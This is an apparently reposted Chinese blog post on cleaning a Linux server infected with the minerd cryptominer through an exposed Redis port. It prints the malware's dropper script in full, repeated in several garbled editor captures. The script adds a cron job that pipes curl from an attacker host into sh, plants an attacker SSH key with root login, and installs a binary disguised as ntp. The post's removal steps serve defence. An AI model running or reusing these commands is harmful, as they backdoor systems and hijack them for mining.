gpt4 book ai didi

linux中了minerd之后的完全清理过程(详解)

转载 作者:qq735679552 更新时间:2022-09-27 22:32:09 31 4
gpt4 key购买 nike

CFSDN坚持开源创造价值,我们致力于搭建一个资源共享平台,让每一个IT人在这里找到属于你的精彩世界.

这篇CFSDN的博客文章linux中了minerd之后的完全清理过程(详解)由作者收集整理,如果你对这篇文章有兴趣,记得点赞哟.

一不小心装了一个Redis服务,开了一个全网的默认端口,一开始以为这台服务器没有公网ip,结果发现之后悔之莫及啊 。

某天发现cpu load高的出奇,发现一个minerd进程 占了大量cpu,google了一下,发现自己中招了 。

下面就是清理过程 。

第一步 。

1.立即停止redis服务,修改端口权限,增加密码措施 。

2.按照网上的资料 删除 crontab 里的两个内容 。

sudo rm /var/spool/cron/root sudo rm /var/spool/cron/crontabs/root 。

3.知己知彼,百战不殆,研究病毒的初始话文件 。

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
"pm.sh" 28L, 1470C                      10,1-8    顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spooll
/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spooll
/cron/crontabs/root
 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITT
shREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZZ
7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kvv
9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1yy
993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK755
NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
                                  10,1-8    顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/rr
oot
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/cc
rontabs/root
 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOcc
9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLL
Kn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm88
gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBrr
o4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
fi
 
if [ ! -f "/etc/init.d/ntp" ]; then
                                     10,1-8    顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/roo
ot
 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yWW
8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQQ
V8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXX
mVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root""
  > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
fi
 
if [ ! -f "/etc/init.d/ntp" ]; then
     if [ ! -f "/etc/systemd/system/ntp.service" ]; then
         mkdir -p /opt
@
                                          10,1-8    顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/AA
g1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txLL
6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNyy
tbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
fi
 
if [ ! -f "/etc/init.d/ntp" ]; then
     if [ ! -f "/etc/systemd/system/ntp.service" ]; then
         mkdir -p /opt
         curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK77
5NEOiq33 && /opt/KHK75NEOiq33 -Install
     fi
fi
 
                                                 10,1-8    顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TT
dRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6ww
L4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdd
Y7vRnrvFav root" > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
fi
 
if [ ! -f "/etc/init.d/ntp" ]; then
     if [ ! -f "/etc/systemd/system/ntp.service" ]; then
         mkdir -p /opt
         curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opp
t/KHK75NEOiq33 -Install
     fi
fi
 
/etc/init.d/ntp start
 
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
                                                        10,1-8    顶端
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYY
pLJ53mzb1JpQVj+wZ7yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbb
BXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y993qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
fi
 
if [ ! -f "/etc/init.d/ntp" ]; then
     if [ ! -f "/etc/systemd/system/ntp.service" ]; then
         mkdir -p /opt
         curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Instaa
ll
     fi
fi
 
/etc/init.d/ntp start
 
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9
~
~
~
~
~
                                                                   10,1-8    全部
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
 
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77
yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999
3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
fi
 
if [ ! -f "/etc/init.d/ntp" ]; then
     if [ ! -f "/etc/systemd/system/ntp.service" ]; then
         mkdir -p /opt
         curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
     fi
fi
 
/etc/init.d/ntp start
 
ps auxf|grep -v grep|grep "/usr/bin/cron"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "/opt/cron"|awk '{print $2}'|xargs kill -9

得到结果 。

1.删除crontab的配置文件,如上我们已经删除,涉及的代码 。

?
1
2
3
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root

2.删除 这个是用来免密码登陆的 。

rm -f ~/.ssh/authorized_keys* rm -f ~/.ssh/KHK75NEOiq 。

你甚至可以直接把.ssh这个目录删除掉 涉及的代码 。

?
1
2
3
4
5
6
7
8
9
10
11
12
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
     mkdir -p ~/.ssh
     rm -f ~/.ssh/authorized_keys*
     echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCzwg/9uDOWKwwr1zHxb3mtN++94RNITshREwOc9hZfS/F/yW8KgHYTKvIAk/Ag1xBkBCbdHXWb/TdRzmzf6P+d+OhV4u9nyOYpLJ53mzb1JpQVj+wZ77
yEOWW/QPJEoXLKn40y5hflu/XRe4dybhQV8q/z/sDCVHT5FIFN+tKez3txL6NQHTz405PD3GLWFsJ1A/Kv9RojF6wL4l3WCRDXu+dm8gSpjTuuXXU74iSeYjc4b0H1BWdQbBXmVqZlXzzr6K9AZpOM+ULHzdzqrA3SX1y999
3qHNytbEgN+9IZCWlHOnlEPxBro4mXQkTVdQkWo0L4aR7xBlAdY7vRnrvFav root" > ~/.ssh/KHK75NEOiq
     echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
     echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
     echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
     echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
     /etc/init.d/sshd restart
fi

3.删除 /opt/这个目录 这玩意是第四步的服务产生的 。

4.删除服务 。

service ntp stop rm /etc/init.d/ntp rm /usr/sbin/ntp 涉及的代码 。

?
1
2
3
4
5
6
if [ ! -f "/etc/init.d/ntp" ]; then
     if [ ! -f "/etc/systemd/system/ntp.service" ]; then
         mkdir -p /opt
         curl -fsSL http://r.chanstring.com/v51/lady_`uname -m` -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -Install
     fi
fi

如上的代码,下载了一个8M的程序,是安装了什么东西,楼主也不知道,但是接下来的代码暴露了行踪 。

/etc/init.d/ntp start 。

这行代码启动了ntp这个服务,百度搜了下说是个时间服务,其实这玩意是病毒服务,打开这个文件,找到可执行文件/usr/sbin/ntp 发现文件和那个8m的文件一个字节不差 。

所以删除这个文件 。

最后 。

ps aux|grep minerd 。

kill 掉所有的进程,ok修复结束 。

半小时之后 。

ps aux|grep minerd 。

minerd进程不再出现 。

以上就是小编为大家带来的linux中了minerd之后的完全清理过程(详解)全部内容了,希望大家多多支持我~ 。

最后此篇关于linux中了minerd之后的完全清理过程(详解)的文章就讲到这里了,如果你想了解更多关于linux中了minerd之后的完全清理过程(详解)的内容请搜索CFSDN的文章或继续浏览相关文章,希望大家以后支持我的博客! 。

31 4 0
Copyright 2021 - 2024 cfsdn All Rights Reserved 蜀ICP备2022000587号
广告合作:1813099741@qq.com 6ren.com